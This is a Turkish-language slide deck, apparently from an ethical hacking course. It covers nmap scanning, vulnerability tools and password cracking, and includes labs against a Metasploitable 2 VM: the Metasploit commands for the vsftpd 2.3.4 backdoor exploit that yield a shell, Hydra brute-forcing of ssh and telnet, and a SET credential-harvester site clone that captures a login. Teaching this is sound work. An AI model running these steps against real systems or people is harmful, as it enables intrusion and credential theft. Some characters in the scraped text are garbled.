ݺߣ

ݺߣShare a Scribd company logo
TARAMA, ZAFİYET TESPİTİ VE
PAROLA KIRMA
10. Hafta
Tarama
• Nmap
– Host, versiyon, tcp, ping, protocol, vb..
• Hping3
– Port, flag(paket), udp, vb..
• Zmap
• Netcat
• Nbtscan
nmap
• Nmap (Network Mapper)
– sT (3lü el sıkışma)
– sS (Syn taraması)
– sA (Ack firewall varmı)
– P 80 (ping olmadan 80.port)
– sU (Udp portlar)
– V (versiyonlar)
– O (işletim sistemi tahmini)
• nmap -sS -sV --open -n 192.168.1.1
Zafiyet Tespiti
• Network
– Nessus, OpenVas, INFRA
• Web
– Nikto, Acunetix, Burp Suite, Owasp Zap
• Metasploit
• Metasploitable 2
Parola Kırma
• Hydra
• Medusa
• Mimikatz
• Ncrack
hydra -L userlist -P passlist 192.168.0.1 protokol
Uygulama 1
• Metasploitable 2
• Nmap
• vsftpd
• Metasploit
• Exploit
Metasploitable
Sanal makine olarak çışııǰܳ..
Metasploitable
Kullanıcı adı ve parola, msfadmin
Metasploitable
ifconfig komutu ile IP bilgisini öğreniyoruz..
Erişim Kontrolü
Kali sanal makinamızdan Metasploitable2 sanal
makinamıza ping ile erişim sağladığımızı kontrol
ediyoruz. (Metasploitable’ın IP’sini öğrenmiştik)
Nmap ile Tarama
Nmap aracı ile sanal makinamızın taramasını
başlatıyoruz.
(Taradığımız makine, metasploitable sanal makinesi)
Nmap Tarama Sonuçları
Tarama sonucu zaafiyetler barından sistemde açık olan
servisler, portları ve sürüm bilgilerine erişiyoruz.
Nmap Sonucu Değerlendirme
İlk sırada bulunan ftp servisinin vsftpd sürümüne ilişkin
bir zafiyet sömürme aracı varmı kontrol ediyoruz.
Metasploit
Metasploit aracını açıyoruz..
msfconsole veya M simgesi ile..
Metasploit
Metasploit içerisinde vsftpd ile ilgili arama yapıyoruz..
search vsftpd
Bir adet backdoor buluyoruz.
Metasploit
Bulduğumuz exploit’i kullanmaya ve seçeneklerini
görmeye başlıyoruz.
use exploit/unix/ftp/vsftpd_234_backdoor
show options
Metasploit
Ardından RHOST ile IP tanımlıyoruz, payload
seçeneklerine bakıyoruz.
set RHOST 192.168.72.131
show payloads
Metasploit
Payload’ı kullanmak için tanımlıyoruz ve seçeneklerine
bakıyoruz.
set payload cmd/unix/interact
show payloads
Metasploit
RPORT ile port tanımlamasını yapıyoruz.
set RPORT 21
Metasploit
Tanımladığımız bilgiler doğrultusunda payload’ın
çalıştırılması için başlatıyoruz.
exploit
veya
Run
Metasploit
Exploit çalıştı başarılı bir şekilde payload makinanın
shell oturumunu açtı.. Artık sistemdeyiz…
Uygulama 2
• Metasploitable 2
• Nmap
• ssh
• hydra
Metasploitable
Hedef sistem olarak belirlenen sanal
makinamızın IP bilgisini öğrendikten sonra Nmap
taraması ile erişmek istediğimiz servisleri
belirliyoruz. (telnet ve ssh)
Hydra ile Parola Kırma Atağı
Servislerin kullanıcı adı ve parolasını tekil olarak tahmin
ile denemek için Hydra’yı kullanıyoruz. (telnet ve ssh)
Hydra
Kullanıcı adı ve parola listeleri oluşturup onları Hydra ile
deniyoruz.
Hydra
Liste denemelerimizin sonuçları.. (telnet ve ssh)
Uygulama 3
• Man in the Middle
• Sosyal mühendislik
Sosyal Mühendislik
Site clone yöntemi ile kişileri orijinal sitelerin
benzer zararlı kopyalarına ulaştırıp kullanıcı adı
ve parola bilgilerini alma amaçlı bir sosyal
mühendislik saldırı örneği oluşturmak için;
Se-Toolkit kullanıyoruz.
Sosyal Mühendislik
SET açılıyor..
Sosyal Mühendislik
Sosyal Mühendislik Atağı’nı çǰܳ..
Sosyal Mühendislik
Web site atağını çǰܳ..
Sosyal Mühendislik
Kimlik Doğrulayıcı(Credential Harvester) atağını çǰܳ..
Sosyal Mühendislik
Site klonlamayı çǰܳ..
Sosyal Mühendislik
Klon site için IP adresi belirleyip, Gerçek sitenin url
bilgisini yazıyoruz.(klonu yapılacak site)
Sosyal Mühendislik
Klonumuz hazır.. Artık tarayıcı ile IP adresine gelen
kullanıcının bilgilerini alabiliriz..
Sosyal Mühendislik
Tarayıcı açıp IP adresini giriyoruz..
Sosyal Mühendislik
Klonumuz karşımızda..
Sosyal Mühendislik
Kullanıcı bilgilerini girdiğinde ve giriş yaptığında sanki
yanlış yazılmış gibi orijinal siteye gönderiyor..
Sosyal Mühendislik
Orijinal site..
Sosyal Mühendislik
Kullanıcının girdiği bilgiler artık elimizde…
Kullanıcı adı ve parola..

More Related Content

Siber Güvenlik ve Etik Hacking Sunu - 10